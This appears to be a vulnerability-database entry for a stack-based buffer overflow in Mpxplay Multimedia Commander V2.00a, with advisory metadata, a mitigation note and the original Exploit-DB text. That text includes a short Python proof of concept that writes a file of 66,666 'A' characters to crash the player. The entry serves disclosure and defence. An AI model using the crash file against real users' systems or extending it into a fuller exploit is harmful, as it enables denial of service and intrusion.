Mpxplay Multimedia Commander Stack-based BOF

vendor:

Mpxplay Multimedia Commander

by:

Un_N0n

7,8

CVSS

HIGH

Stack-based Buffer Overflow

121

CWE

Product Name: Mpxplay Multimedia Commander

Affected Version From: V2.00a

Affected Version To: V2.00a

Patch Exists: YES

Related CWE: N/A

CPE: a:mpxplay:mpxplay_multimedia_commander

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x86(32 BIT)

2015

Mpxplay Multimedia Commander Stack-based BOF

A stack-based buffer overflow vulnerability exists in Mpxplay Multimedia Commander V2.00a. An attacker can exploit this vulnerability by creating a specially crafted .m3u file containing a large amount of 'A' characters and opening it in the audio player. This will cause a crash of the application.

Mitigation:

Update to the latest version of Mpxplay Multimedia Commander.

Source

Exploit-DB raw data:

********************************************************************************************
# Exploit Title: Mpxplay Multimedia Commander Stack-based BOF
# Date: 9/1/2015
# Exploit Author: Un_N0n
# Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity
# Version: V2.00a
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'mpxp_mmc.exe'.
2- Browser Crash.m3u in audio player.
~ Software will Crash.

[Code to produce crash.txt]: 
junk = "A"*66666
file = open("CRASH.m3u",'w')
file.write(junk)
file.close()
**********************************************************************************************